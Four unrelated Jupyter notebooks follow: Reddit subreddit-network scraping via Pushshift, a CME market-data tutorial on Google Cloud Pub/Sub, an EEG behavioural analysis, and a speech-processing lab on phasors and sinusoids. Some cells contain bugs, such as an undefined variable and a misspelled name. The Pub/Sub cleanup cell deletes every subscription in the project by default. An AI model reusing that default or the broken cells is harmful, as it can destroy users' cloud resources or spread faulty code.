We define a convenient function to get data from Pushshift:
```
def get_pushshift_data(data_type, params):
"""
Gets data from the pushshift api.
data_type can be 'comment' or 'submission'
The rest of the args are interpreted as payload.
Read more: https://github.com/pushshift/api
This function is inspired from:
https://www.jcchouinard.com/how-to-use-reddit-api-with-python/
"""
base_url = f"https://api.pushshift.io/reddit/search/{data_type}/"
request = requests.get(base_url, params=params)
print('Query:')
print(request.url)
try:
data = request.json().get("data")
except:
print('--- Request failed ---')
data = []
return data
```
This function accepts the parameters of the pushshift API detailed in the doc at https://github.com/pushshift/api. An example is given below.
## Example of request to the API
Let us collect the comments written in the last 2 day in the subreddit `askscience`. The number of results returned is limited to 100, the upper limit of the API.
```
# parameters for the pushshift API
data_type = "comment" # accept "comment" or "submission", search in comments or submissions
params = {
"subreddit" : "askscience", # limit to one or a list of subreddit(s)
"after" : "2d", # Select the timeframe. Epoch value or Integer + "s,m,h,d" (i.e. "second", "minute", "hour", "day")
"size" : 100, # Number of results to return (limited to max 100 in the API)
"author" : "![deleted]" # limit to a list of authors or ignore authors with a "!" mark in front
}
# Note: the option "aggs" (aggregate) has been de-activated in the API
data = get_pushshift_data(data_type, params)
df = pd.DataFrame.from_records(data)
print('Some of the data returned:')
df[['author', 'subreddit', 'score', 'created_utc', 'body']].head()
```
## Authors of comments
Let us collect the authors of comments in a subreddit during the last days. The next function helps bypassing the limit of results by sending queries multiple times, avoiding collecting duplicate authors.
```
# Get the list of unique authors of comments in the API results
# bypass the limit of 100 results by sending multiple queries
def get_unique_authors(n_results, params):
results_per_request = 100 # default nb of results per query
n_queries = n_results // results_per_request + 1
author_list = []
author_neg_list = ["![deleted]"]
for query in range(n_queries):
params["author"] = author_neg_list
data = get_pushshift_data(data_type="comment", params=params)
df = pd.DataFrame.from_records(data)
if df.empty:
return author_list
authors = list(df['author'].unique())
# add ! mark
authors_neg = ["!"+ a for a in authors]
author_list += authors
author_neg_list += authors_neg
return author_list
# Ask for the authors of comments in the last days, colect at least "n_results"
subreddit = "askscience"
data_type = "comment"
params = {
"subreddit" : subreddit,
"after" : "2d"
}
n_results = 500
author_list = get_unique_authors(n_results, params)
print("Number of authors:",len(author_list))
# Collect the subreddits where the authors wrote comments and the number of comments
from collections import Counter
data_type = "comment"
params = {
"size" : 100
}
subreddits_count = Counter()
for author in author_list:
params["author"] = author
print(params["author"])
data = get_pushshift_data(data_type=data_type, params=params)
if data: # in case the resquest failed and data is empty
df = pd.DataFrame.from_records(data)
subreddits_count += Counter(dict(df['subreddit'].value_counts()))
```
## Network of subreddits (ego-graph)
Let us build the ego-graph of the subreddit. Other subreddits will be connected to the main one if the users commented in the other subreddits as well.
```
# module for networks
import networkx as nx
threshold = 0.05
G = nx.Graph()
G.add_node(subreddit)
self_refs = subreddits_count[subreddit]
for sub,value in subreddits_count.items():
post_ratio = value/self_refs
if post_ratio >= threshold:
G.add_edge(subreddit,sub, weight=post_ratio)
print("Total number of edges in the graph:",G.number_of_edges())
```
Here is an alternative way of generating the graph using pandas dataframes instead of a for loop (it might scale better on bigger graphs).
```
threshold = 0.05
subreddits_count_df = pd.DataFrame.from_dict(subreddits_count, orient='index', columns=['total'])
subreddits_ratio_df = subreddits_count_df/subreddits_count_df.loc[subreddit]
subreddits_ratio_df.rename(columns={'total': 'weight'}, inplace=True)
filtered_sr_df = subreddit_ratio_df[subreddits_ratio_df['weight'] >= threshold].copy() # filter weights < threshold
filtered_sr_df['source'] = subreddit
filtered_sr_df['target'] = filtered_sr_df.index
Gdf = nx.from_pandas_edgelist(filtered_sr_df, source='source', target='target', edge_attr=True)
print("Total number of edges in the graph:",Gdf.number_of_edges())
# Write the graph to a file
path = 'egograph.gexf'
nx.write_gexf(G,path)
```
## Network of subreddit neighbors
This second collection makes a distinction between the related subreddits. For each author, all the subreddits where he/she commented will be connected together. The weight of each connection will be proportional to the number of users commenting in both subreddits joined by the connection. The ego-graph becomes an approximate neighbor network for the central subreddit.
```
data_type = "comment"
params = {
"size" : 100
}
count_list = []
for author in author_list:
params["author"] = author
print(params["author"])
data = get_pushshift_data(data_type=data_type, params=params)
if data:
df = pd.DataFrame.from_records(data)
count_list.append(Counter(dict(df['subreddit'].value_counts())))
import itertools
threshold = 0.05
G = nx.Graph()
for author_sub_count in count_list:
sub_list = author_sub_count.most_common(10)
# Compute all the combinations of subreddit pairs
sub_combinations = list(itertools.combinations(sub_list, 2))
for sub_pair in sub_combinations:
node1 = sub_pair[0][0]
node2 = sub_pair[1][0]
if G.has_edge(node1, node2):
G[node1][node2]['weight'] +=1
else:
G.add_edge(node1, node2, weight=1)
print("Total number of edges {}, and nodes {}".format(G.number_of_edges(),G.number_of_nodes()))
# Sparsify the graph
to_remove = [edge for edge in G.edges.data() if edge[2]['weight'] < 2]
G.remove_edges_from(to_remove)
# Remove isolated nodes
G.remove_nodes_from(list(nx.isolates(G)))
print("Total number of edges {}, and nodes {}".format(G.number_of_edges(),G.number_of_nodes()))
# Write the graph to a file
path = 'graph.gexf'
nx.write_gexf(G,path)
```
An example of the graph visualization you can obtain using Gephi:

|
github_jupyter
|
# CME Smart Stream on Google Cloud Platform Tutorials
## Getting CME Binary Data from CME Smart Stream on Google Cloud Platform (GCP)
This workbook demonstrates the ability to quickly use the CME Smart Stream on GCP solution. Through the examples, we will
- Authenticate using GCP IAM information
- Configure which CME Smart Stream on GCP Topic containing the Market Data
- Download a single message from your Cloud Pub/Sub Subscription
- Delete your Cloud Pub/Sub Subscription
The following example references the following webpage to pull the information:
https://www.cmegroup.com/confluence/display/EPICSANDBOX/CME+Smart+Stream+GCP+Topic+Names
Author: Aaron Walters (Github: @aaronwalters79).
OS: MacOS
```
#import packages. These are outlined in the environment.ymal file as part of this project.
#these can also be directly imported.
# Google SDK: https://cloud.google.com/sdk/docs/quickstarts
# Google PubSub: https://cloud.google.com/pubsub/docs/reference/libraries
from google.cloud import pubsub_v1
import os
import google.auth
```
# Authentication using Google IAM
CME Smart Stream uses Google Cloud native Idenity and Accesss Management (IAM) solutions. Using this approach, customers are able to natively access CME Smart Stream solution without custom SDK's or authentication routines. All the code in this workboard is native Google Python SDK. While the Google Pub/Sub examples below are using python, there are native SDK's for other popular languages including Java, C#, Node.js, PHP, and others.
To download those libraries, please see the following location: https://cloud.google.com/pubsub/docs/reference/libraries
When onboarding to CME Smart Stream, you will supply at least one Google IAM Member accounts. https://cloud.google.com/iam/docs/overview. When accessing CME Smart Stream Topics, you will use the same IAM account infromation to create your Subscription using navative GCP authenticaion routines within the GCP SDK.
The following authentication routines below use either a Service Account or User Account. Google highly recomends using an Service Account with associated authorization json. This document also contains authentication via User Account in the event you requested CME to use User Account for access. You only need to use one of these for the example.
## Authentication Routine for Service Account
This section is for customers using Service Accounts. You should update the './gcp-auth.json' to reference your local authorization json file downloaded from google.
Further documentation is located here: https://cloud.google.com/docs/authentication/getting-started
```
## Authentication Method Options -- SERVICE ACCOUNT JSON FILE
# This should point to the file location of the json file downloaded from GCP console. This will load it into your os variables and be automtically leverage when your system interacts with GCP.
#os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = "./gcp-auth.json" #Uncomment if using this method.
```
## Authentication for User Account
This section is for customers that registered thier GCP User Account (i.e. user@domain.com). This routine will launch the OS SDK to authenticate you as that user and then set it as your default credentials for the rest of the workflow when interacting with GCP.
IN OS TERMINAL: 'gcloud auth application-default login' without quotes.
```
## Authentication Method User Machine Defaults
#
#Run "gcloud auth login" in command line and login as the user. The code below will do that automatically.
#It should laucnh a browser to authenticate into GCP that user name and associated permissions will be used in the remaining of the code below
# This code will put out a warning about using end user credentials.
# Reference: https://google-auth.readthedocs.io/en/latest/user-guide.html
credentials, project = google.auth.default()
```
# Set Your Smart Stream on GCP Projects and Topics
## Set CME Smart Stream Project
CME Smart Stream on GCP data is avaliable in two GCP Projects based upon Production and Non-Production (i.e. certification and new release) data. Customers are granted access to projects through the onboarding process.
The example below sets the target CME Smart Stream on GCP Project as an OS variable for easy reference.
```
#This is the project at CME
os.environ['GOOGLE_CLOUD_PROJECT_CME'] = "cmegroup-marketdata-newrel" #CERT and NEW RELEASE
#os.environ['GOOGLE_CLOUD_PROJECT_CME'] = "cmegroup-marketdata" #PRODUCTION
```
## Set CME Smart Stream Topics
CME Smart Stream on GCP follows the traditional data segmentation of the CME Multicast solution.
Each channel on Multicast is avaliable as a Topic in Google Cloud PubSub. This workbook will create 1 subscription in the customer's account against 1 Topic from the CME project. Clearly, customers can script this to create as many subscriptions as needed.
Please see: https://www.cmegroup.com/confluence/display/EPICSANDBOX/CME+Smart+Stream+GCP+Topic+Names for all the topic names.
You can also review the notebook included in this git project named Google PubSub Get CME Topics on how to read the names from the website into a local CSV file or use in automated scripts.
```
# The CME TOPIC that a Subscription will be created against
os.environ['GOOGLE_CLOUD_TOPIC_CME'] = "CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310" #CERT
#s.environ['GOOGLE_CLOUD_TOPIC_CME'] = "NR.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310" #NEW RELEASE
#os.environ['GOOGLE_CLOUD_TOPIC_CME'] = "CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310" #PRODUCTION
```
# Set Customer Configurations
## Set Customer Project & Subscription Name
Smart Stream on GCP solution requires that the customer create a Cloud Pub/Sub Subscription in thier account. This subscription will automatically collect data from the CME Smart Stream Pub/Sub Topic. Since the Subscriptin is in the customer account we must specify the customer GCP Project and the name of the Subscription they want in the project.
In the example below, we set the project directly based upon our GCP project name. We also create a subscription name by prepending 'MY_' to the name of the Topic we are joining.
```
#Your Configurations for the project you want to have access;
#will use the defaults from credentials
os.environ['GOOGLE_CLOUD_PROJECT'] = "prefab-rampart-794"
#My Subscipription Name -- Take the CME Topic Name and prepend 'MY_' -- Can be any thing the customer wants
os.environ['MY_SUBSCRIPTION_NAME'] = 'MY_'+os.environ['GOOGLE_CLOUD_TOPIC_CME'] #MY SUBSCRIPTION NAME
```
# Final Configuration
The following is the final configuration for your setup.
```
print ('Target Project: \t',os.environ['GOOGLE_CLOUD_PROJECT_CME'] )
print ('Target Topic: \t\t', os.environ['GOOGLE_CLOUD_TOPIC_CME'] , '\n' )
print ('My Project: \t\t',os.environ['GOOGLE_CLOUD_PROJECT'])
print ('My Subscriptions: \t',os.environ['MY_SUBSCRIPTION_NAME'] )
```
# Create Your Subscription to CME Smart Stream Data Topics
We have all the main variables set and can pass them to the Cloud Pub/Sub Python SDK. The following attempts to create a Subscription (MY_SUBSCRIPTION_NAME) in your specified project (GOOGLE_CLOUD_PROJECT) that points to the CME Topic (GOOGLE_CLOUD_TOPIC_CME) and Project (GOOGLE_CLOUD_PROJECT_CME) of that Topic.
Once created or determined it already exists we will join our python session to the Subscription as 'subscriber'.
Full documentation on this Pub/Sub example is avaliable: https://googleapis.github.io/google-cloud-python/latest/pubsub/#subscribing
```
#https://googleapis.github.io/google-cloud-python/latest/pubsub/#subscribing
#Create Topic Name from Config Above
topic_name = 'projects/{cme_project_id}/topics/{cme_topic}'.format( cme_project_id=os.getenv('GOOGLE_CLOUD_PROJECT_CME'), cme_topic=os.getenv('GOOGLE_CLOUD_TOPIC_CME'), )
#Create Subscription Name from Config Above
subscription_name = 'projects/{my_project_id}/subscriptions/{my_sub}'.format(my_project_id=os.getenv('GOOGLE_CLOUD_PROJECT'),my_sub=os.environ['MY_SUBSCRIPTION_NAME'], )
#Try To Create a subscription in your Project
subscriber = pubsub_v1.SubscriberClient(credentials=credentials)
try:
subscriber.create_subscription(
name=subscription_name,
topic=topic_name,
ack_deadline_seconds=60, #This limits the likelihood google will redeliver a recieved message, default is 10s.
)
print ('Created Subscriptions in Project \n')
print ('Listing Subscriptions in Your Project %s : ' % os.getenv('GOOGLE_CLOUD_PROJECT'))
for subscription in subscriber.list_subscriptions(subscriber.project_path(os.environ['GOOGLE_CLOUD_PROJECT'])):
print('\t', subscription.name)
except:
e = sys.exc_info()[1]
print( "Error: %s \n" % e )
```
## Subscription View in Google Cloud Console
Subscriptions are also avaliable for viewing in Google Cloud Console (https://console.cloud.google.com/). Navigate to Cloud Pub/Sub and click Subscription. If you click your Subscription Name, it will open up the details about that Subscription. You can see the all queued messages and core settings which are set to default settings as we did not specify special settings and the functions above used the defaults.
Another thing shown in this view is the total queued messages from GCP in the Subscription.
## Pull a Single Message from CME
The following will do a simple message pull from your Subscription and print it out locally. There are extensive examples on data pulling from a Subscription including batch and async (https://cloud.google.com/pubsub/docs/pull).
```
#Pull 1 Message
print ('Pulling a Single Message and Displaying:')
CME_DATA = subscriber.pull(subscription_name, max_messages=1)
#Print that Message
print (CME_DATA)
```
# Delete Subscriptions
You can also use the Python SDK to delete your Cloud Pub/Sub Subscriptions. The following will attempt to delete ALL the subscriptions in your Project.
```
#List Subscriptions in My Project / Delete Subscription
delete = True
subscriber = pubsub_v1.SubscriberClient()
project_path = subscriber.project_path(os.environ['GOOGLE_CLOUD_PROJECT'])
if not delete:
print ('Did you mean to Delete all Subscriptions? If yes, then set delete = True')
for subscription in subscriber.list_subscriptions(project_path):
#Delete Subscriptions
if delete:
subscriber.delete_subscription(subscription.name)
print ("\tDeleted: {}".format(subscription.name))
else:
print("\tActive Subscription: {}".format(subscription.name))
```
# Summary
This notebook went through the bare minimum needed to create a Cloud Pub/Sub Subscription against the CME Smart Stream on GCP solutions.
# Questions?
If you have questions or think we can update this to additional use cases, please use the Issues feature in Github or reach out to CME Sales team at markettechsales@cmegroup.com
|
github_jupyter
|
```
from __future__ import division
%matplotlib inline
import sys
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import scipy.io as io
import pickle
import scipy.stats
SBJ = 'colin_test2'
prj_dir = '/Volumes/hoycw_clust/PRJ_Error_eeg/'#'/Users/sheilasteiner/Desktop/Knight_Lab/PRJ_Error_eeg/'
results_dir = prj_dir+'results/'
fig_type = '.png'
data_dir = prj_dir+'data/'
sbj_dir = data_dir+SBJ+'/'
```
### Load paradigm parameters
```
prdm_fname = os.path.join(sbj_dir,'03_events',SBJ+'_prdm_vars.pkl')
with open(prdm_fname, 'rb') as f:
prdm = pickle.load(f)
```
### Load Log Info
```
behav_fname = os.path.join(sbj_dir,'03_events',SBJ+'_behav.csv')
data = pd.read_csv(behav_fname)
# Remove second set of training trials in restarted runs (EEG12, EEG24, EEG25)
if len(data[(data['Trial']==0) & (data['Block']==-1)])>1:
train_start_ix = data[(data['Trial']==0) & (data['Block']==-1)].index
train_ix = [ix for ix in data.index if data.loc[ix,'Block']==-1]
later_ix = [ix for ix in data.index if ix >= train_start_ix[1]]
data = data.drop(set(later_ix).intersection(train_ix))
data = data.reset_index()
# Change block numbers on EEG12 to not overlap
if SBJ=='EEG12':
b4_start_ix = data[(data['Trial']==0) & (data['Block']==4)].index
for ix in range(b4_start_ix[1]):
if data.loc[ix,'Block']!=-1:
data.loc[ix,'Block'] = data.loc[ix,'Block']-4
# Label post-correct (PC), post-error (PE) trials
data['PE'] = [False for _ in range(len(data))]
for ix in range(len(data)):
# Exclude training data and first trial of the block
if (data.loc[ix,'Block']!=-1) and (data.loc[ix,'Trial']!=0):
if data.loc[ix-1,'Hit']==0:
data.loc[ix,'PE'] = True
# pd.set_option('max_rows', 75)
# data[data['Block']==3]
```
# Add specific analysis computations
```
# Find middle of blocks to plot accuracy
block_start_ix = data[data['Trial']==0].index
if SBJ=='EP11':#deal with missing BT_T0
block_mid_ix = [ix+prdm['n_trials']/2 for ix in block_start_ix]
else:
block_mid_ix = [ix+prdm['n_trials']/2 for ix in block_start_ix[1:]]
# Add in full_vis + E/H training: 0:4 + 5:19 = 10; 20:34 = 27.5
block_mid_ix.insert(0,np.mean([prdm['n_examples']+prdm['n_training'],
prdm['n_examples']+2*prdm['n_training']])) #examples
block_mid_ix.insert(0,np.mean([0, prdm['n_examples']+prdm['n_training']]))
#easy training (would be 12.5 if splitting examples/train)
# Compute accuracy per block
accuracy = data['Hit'].groupby([data['Block'],data['Condition']]).mean()
acc_ITI = data['Hit'].groupby([data['ITI type'],data['Condition']]).mean()
for ix in range(len(data)):
data.loc[ix,'Accuracy'] = accuracy[data.loc[ix,'Block'],data.loc[ix,'Condition']]
data.loc[ix,'Acc_ITI'] = acc_ITI[data.loc[ix,'ITI type'],data.loc[ix,'Condition']]
# Break down by post-long and post-short trials
data['postlong'] = [False if ix==0 else True if data['RT'].iloc[ix-1]>1 else False for ix in range(len(data))]
# Compute change in RT
data['dRT'] = [0 for ix in range(len(data))]
for ix in range(len(data)-1):
data.loc[ix+1,'dRT'] = data.loc[ix+1,'RT']-data.loc[ix,'RT']
# Grab rating data to plot
rating_trial_idx = [True if rating != -1 else False for rating in data['Rating']]
rating_data = data['Rating'][rating_trial_idx]
```
# Plot Full Behavior Across Dataset
```
# Accuracy, Ratings, and Tolerance
f, ax1 = plt.subplots()
x = range(len(data))
plot_title = '{0} Tolerance and Accuracy: easy={1:0.3f}; hard={2:0.3f}'.format(
SBJ, data[data['Condition']=='easy']['Hit'].mean(),
data[data['Condition']=='hard']['Hit'].mean())
colors = {'easy': [0.5, 0.5, 0.5],#[c/255 for c in [77,175,74]],
'hard': [1, 1, 1],#[c/255 for c in [228,26,28]],
'accuracy': 'k'}#[c/255 for c in [55,126,184]]}
scat_colors = {'easy': [1,1,1],#[c/255 for c in [77,175,74]],
'hard': [0,0,0]}
accuracy_colors = [scat_colors[accuracy.index[ix][1]] for ix in range(len(accuracy))]
#scale = {'Hit Total': np.max(data['Tolerance'])/np.max(data['Hit Total']),
# 'Score Total': np.max(data['Tolerance'])/np.max(data['Score Total'])}
# Plot Tolerance Over Time
ax1.plot(data['Tolerance'],'b',label='Tolerance')
ax1.plot(x,[prdm['tol_lim'][0] for _ in x],'b--')
ax1.plot(x,[prdm['tol_lim'][1] for _ in x],'b--')
ax1.set_ylabel('Target Tolerance (s)', color='b')
ax1.tick_params('y', colors='b')
ax1.set_xlim([0,len(data)])
ax1.set_ylim([0, 0.41])
ax1.set_facecolor('white')
ax1.grid(False)
# Plot Accuracy per Block
ax2 = ax1.twinx()
# ax2.plot(data['Hit Total']/np.max(data['Hit Total']),'k',label='Hit Total')
ax2.fill_between(x, 1, 0, where=data['Condition']=='easy',
facecolor=colors['easy'], alpha=0.3)#, label='hard')
ax2.fill_between(x, 1, 0, where=data['Condition']=='hard',
facecolor=colors['hard'], alpha=0.3)#, label='easy')
ax2.scatter(block_mid_ix, accuracy, s=50, c=accuracy_colors,
edgecolors='k', linewidths=1)#colors['accuracy'])#,linewidths=2)
ax2.scatter(rating_data.index.values, rating_data.values/100, s=25, c=[1, 0, 0])
ax2.set_ylabel('Accuracy', color=colors['accuracy'])
ax2.tick_params('y', colors=colors['accuracy'])
ax2.set_xlabel('Trials')
ax2.set_xlim([0,len(data)])
ax2.set_ylim([0, 1])
ax2.set_facecolor('white')
ax2.grid(False)
plt.title(plot_title)
plt.savefig(results_dir+'BHV/ratings_tolerance/'+SBJ+'_tolerance'+fig_type)
```
# Plot only real data (exclude examples + training)
```
data_all = data
# Exclude: Training/Examples, non-responses, first trial of each block
if data[data['RT']<0].shape[0]>0:
print 'WARNING: '+str(data[data['RT']<0].shape[0])+' trials with no response!'
data = data[(data['Block']!=-1) & (data['RT']>0) & (data['ITI']>0)]
```
## Histogram of ITIs
```
# ITI Histogram
f,axes = plt.subplots(1,2)
bins = np.arange(0,1.1,0.01)
hist_real = sns.distplot(data['ITI'],bins=bins,kde=False,label=SBJ,ax=axes[0])
hist_adj = sns.distplot(data['ITI type'],bins=bins,kde=False,label=SBJ,ax=axes[1])
axes[0].set_xlim([0, 1.1])
axes[1].set_xlim([0, 1.1])
plt.subplots_adjust(top=0.93)
f.suptitle(SBJ)
plt.savefig(results_dir+'BHV/ITIs/'+SBJ+'_ITI_hist'+fig_type)
```
## Histogram of all RTs
```
# RT Histogram
f,ax = plt.subplots()
hist = sns.distplot(data['RT'],label=SBJ)
plt.subplots_adjust(top=0.9)
hist.legend() # can also get the figure from plt.gcf()
plt.savefig(results_dir+'BHV/RTs/histograms/'+SBJ+'_RT_hist'+fig_type)
```
## RT Histograms by ITI
```
# ANOVA for RT differences across ITI
itis = np.unique(data['ITI type'])
if len(prdm['ITIs'])==4:
f,iti_p = scipy.stats.f_oneway(data.loc[data['ITI type']==itis[0],('RT')].values,
data.loc[data['ITI type']==itis[1],('RT')].values,
data.loc[data['ITI type']==itis[2],('RT')].values,
data.loc[data['ITI type']==itis[3],('RT')].values)
elif len(prdm['ITIs'])==3:
f,iti_p = scipy.stats.f_oneway(data.loc[data['ITI type']==itis[0],('RT')].values,
data.loc[data['ITI type']==itis[1],('RT')].values,
data.loc[data['ITI type']==itis[2],('RT')].values)
elif len(prdm['ITIs'])==2:
f,iti_p = scipy.stats.ttest_ind(data.loc[data['ITI type']==itis[0],('RT')].values,
data.loc[data['ITI type']==itis[1],('RT')].values)
else:
print 'WARNING: some weird paradigm version without 2, 3, or 4 ITIs!'
# print f, p
f, axes = plt.subplots(1,2)
# RT Histogram
rt_bins = np.arange(0.7,1.3,0.01)
for iti in itis:
sns.distplot(data['RT'].loc[data['ITI type'] == iti],bins=rt_bins,label=str(round(iti,2)),ax=axes[0])
axes[0].legend() # can also get the figure from plt.gcf()
axes[0].set_xlim(min(rt_bins),max(rt_bins))
# Factor Plot
sns.boxplot(data=data,x='ITI type',y='RT',hue='ITI type',ax=axes[1])
# Add overall title
plt.subplots_adjust(top=0.9,wspace=0.3)
f.suptitle(SBJ+' RT by ITI (p='+str(round(iti_p,4))+')') # can also get the figure from plt.gcf()
# Save plot
plt.savefig(results_dir+'BHV/RTs/hist_ITI/'+SBJ+'_RT_ITI_hist_box'+fig_type)
```
## RT adjustment after being short vs. long
```
# t test for RT differences across ITI
itis = np.unique(data['ITI type'])
f,postlong_p = scipy.stats.ttest_ind(data.loc[data['postlong']==True,('dRT')].values,
data.loc[data['postlong']==False,('dRT')].values)
f, axes = plt.subplots(1,2)
# RT Histogram
drt_bins = np.arange(-0.6,0.6,0.025)
sns.distplot(data['dRT'].loc[data['postlong']==True],bins=drt_bins,label='Post-Long',ax=axes[0])
sns.distplot(data['dRT'].loc[data['postlong']==False],bins=drt_bins,label='Post-Short',ax=axes[0])
axes[0].legend() # can also get the figure from plt.gcf()
axes[0].set_xlim(min(drt_bins),max(drt_bins))
# Factor Plot
sns.boxplot(data=data,x='postlong',y='dRT',hue='postlong',ax=axes[1])
# Add overall title
plt.subplots_adjust(top=0.9,wspace=0.3)
f.suptitle(SBJ+' RT by ITI (p='+str(round(postlong_p,6))+')') # can also get the figure from plt.gcf()
# Save plot
plt.savefig(results_dir+'BHV/RTs/hist_dRT/'+SBJ+'_dRT_postlong_hist_box'+fig_type)
```
##RT and Accuracy Effects by ITI and across post-error
```
# RTs by condition
# if len(prdm_params['ITIs'])==4: # target_time v1.8.5+
# data['ITI type'] = ['short' if data['ITI'][ix]<0.5 else 'long' for ix in range(len(data))]
# ITI_plot_order = ['short','long']
# elif len(prdm_params['ITIs'])==3: # target_time v1.8.4 and below
# data['ITI type'] = ['short' if data['ITI'][ix]<prdm_params['ITI_bounds'][0] else 'long' \
# if data['ITI'][ix]>prdm_params['ITI_bounds'][1] else 'medium'\
# for ix in range(len(data))]
# ITI_plot_order = ['short','medium','long']
# else: # Errors for anything besides len(ITIs)==3,4
# assert len(prdm_params['ITIs'])==4
plot = sns.factorplot(data=data,x='ITI type',y='dRT',hue='PE',col='Condition',kind='point',
ci=95);#,order=ITI_plot_order
plt.subplots_adjust(top=0.9)
plot.fig.suptitle(SBJ) # can also get the figure from plt.gcf()
plt.savefig(results_dir+'BHV/RTs/hist_PE_ITI/'+SBJ+'_RT_PE_ITI_hit'+fig_type)
# WARNING: I would need to go across subjects to get variance in accuracy by ITI
plot = sns.factorplot(data=data,x='ITI type',y='Acc_ITI',col='Condition',kind='point',sharey=False,
ci=95);#,order=ITI_plot_order
#plot.set(alpha=0.5)
plt.subplots_adjust(top=0.9)
plot.fig.suptitle(SBJ) # can also get the figure from plt.gcf()
plt.savefig(results_dir+'BHV/accuracy/'+SBJ+'_acc_ITI'+fig_type)
```
## Look for behavioral adjustments following short and long responses
```
plot = sns.factorplot(data=data_PL,x='ITI type',y='RT',hue='PE',col='Condition',kind='point',
ci=95,order=prdm['ITIs']);
plt.subplots_adjust(top=0.9)
plot.fig.suptitle(SBJ+'_post-long') # can also get the figure from plt.gcf()
# plt.savefig(results_dir+'RT_plots/'+SBJ+'_RT_PE_ITI_hit'+fig_type)
plot2 = sns.factorplot(data=data_PS,x='ITI type',y='RT',hue='PE',col='Condition',kind='point',
ci=95,order=prdm['ITIs']);
plt.subplots_adjust(top=0.9)
plot2.fig.suptitle(SBJ+'_post-short') # can also get the figure from plt.gcf()
# plt.savefig(results_dir+'RT_plots/'+SBJ+'_RT_PE_ITI_hit'+fig_type)
```
|
github_jupyter
|
#### _Speech Processing Labs 2021: SIGNALS 1: Digital Signals: Sampling and Superposition_
```
## Run this first!
%matplotlib inline
import sys
import matplotlib.pyplot as plt
import numpy as np
import cmath
from matplotlib.animation import FuncAnimation
from IPython.display import HTML
plt.style.use('ggplot')
from dspMisc import *
```
# Digital Signals: Sampling and Superposition
### Learning Outcomes
* Understand how we can approximate a sine wave with a specific frequency, given a specific sampling rate
* Understand how sampling rate limits the frequencies of sinusoids we can describe with discrete sequences
* Explain when aliasing will occurr and how this relates the sampling rate and the Nyquist frequency.
* Observe how compound waveforms can be described as a linear combination of phasors ('superposition')
### Background
* Topic Videos: Digital Signal, Short Term Analysis, Series Expansion
* [Interpreting the discrete fourier transform](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb)
#### Extra background (extension material)
* [Phasors, complex numbers and sinusoids](./signals-1-2a-digital-signals-complex-numbers.ipynb)
## 1 Introduction
In the class videos, you've seen that sound waves are changes in air pressure (amplitude) over time. In the notebook [interpreting the discrete fourier transform](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb), we saw that we can
decompose complex sound waves into 'pure tone' frequency components. We also saw that the output of the DFT was actually a sequence of complex numbers! In this notebook, we'll give a bit more background on the relationship
between complex numbers and sinusoids, and why it's useful to characterise sinusoids in the complex plane.
## 2 Phasors and Sinusoids: tl;dr
At this point, I should say that you can get a conceptual understanding of digital signal processing concepts without going through _all_ the math. We certainly won't be examining your knowledge of complex numbers or geometry in this class. Of course, if you want to go further in understanding digital signal processing then you will have to learn a bit more about complex numbers, algebra, calculus and geometry than we'll touch upon here.
However, right now the main point that we'd like you to take away from this notebook is that we can conveniently represent periodic functions, like sine waves, in terms of **phasors**: basically what shown on the left hand side of the following gif:

You can think of the **phasor as an analogue clockface** with one moving hand. On the right hand side is one period of a 'pure tone' sinusoid, sin(t).
Now, we can think of every movement of the 'clockhand' (the phasor is actually this **vector**) as a step in time on the sinusoid graph: at every time step, the phasor (i.e., clockhand) rotates by some angle. If you follow the blue dots on both graphs, you should be able to see that the amplitude of the sinusoid matches the height of the clockhand on the phasor at each time step.
This gives us a different way of viewing the periodicity of $\sin(t)$. The sinusoid starts to repeat itself when the phasor has done one full circle. So, rather than drawing out an infinite time vs amplitude graph, we can capture the behaviour of this periodic function in terms rotations with respect to this finite circle.
So, what's the connection with complex numbers? Well, that blue dot on the phasor actually represents a complex number, and the dimensions of that graph are actually the **real** (horizontal) and **imaginary** (vertical) parts of that number. That is, a complex number of the form $a + jb$, where $a$ is the real part and $b$ is the imaginary part. Quite conveniently, we can also express complex numbers in terms of a **magnitude** or radius $r$ (length of the clockhand) and a **phase angle** $\theta$ (angle of rotation from the point (1,0)) and an exponential. So, we can write each point that the phasor hits in the form $re^{j\theta}$. This will be familiar if you've had a look at the DFT formulae.
This relationship with complex numbers basically allows us to describe complicated periodic waveforms in terms of combinations of 'pure tone' sinusoids. It turns out that maths for this works very elegantly using the phasor/complex number based representation.
The basic things you need to know are:
* A **sinusoid** (time vs amplitude, i.e. in the **time domain**) can be described in terms of a vector rotating around a circle (i.e. a phasor in the complex plane)
* The **phasor** vector (i.e., 'clockhand') is described by a complex number $re^{j\theta}$
* $re^{j\theta}$ is a point on a circle centered at (0,0) with radius $r$, $\theta$ degrees rotated from $(r,0)$ on the 2D plane.
* the **magnitude** $r$ tells us what the peak amplitude of the corresponding sine wave is
* the **phase angle** $\theta$ tells us how far around the circle the phasor has gone:
* zero degrees (0 radians) corresponds to the point (r,0), while 90 degrees ($\pi/2$ radians) corresponds to the point (0,r)
* The vertical projection of the vector (onto the y-axis) corresponds to the amplitude of a **sine wave** $\sin(\theta)$
* The horizontal projection of the vector (onto the x-axis) corresponds to the amplitude of a **cosine wave** $\cos(\theta)$
* The **period** of these sine and cosine waves is the same as the time it takes to make one full circle of the phasor (in seconds). As such the **frequency** of the sine and cosine waves is the same as the frequency with which the phasor makes a full cycle (in cycles/second = Hertz).
If you take the maths on faith, you can see all of this just from the gif above. You'll probably notice in most phonetics text books, if they show this at all, they will just show the rotating phasor without any of the details.
If you want to know more about how this works, you can find a quick tour of these concepts in the (extension) notebook on [complex numbers and sinusoids](./sp-m1-2-digital-signals-complex-numbers). But it's fine if you don't get all the details right now. In fact, if you get the intuition behind from the phasor/sinusoid relationship above, it's fine to move on now to the rest of the content in this notebook.
## Changing the frequency of a sinusoid
So, we think of sine (and cosine) waves in terms of taking steps around a circle in the 2D (complex) plane. Each of these 'steps' was represented by a complex number, $re^{j\theta}$ (the phasor) where the magnitude $r$ tells you the radius of the circle, and the phase angle $\theta$ tells you how far around the circle you are. When $\theta = 0$, means you are at the point (r,0), while $\theta = 90$ degrees means you are at the point (0,r). There are 360 degrees (or 2$\pi$ radians) makes a complete cycle, i.e. when $\theta = 360$ degrees, you end up back at (r,0).
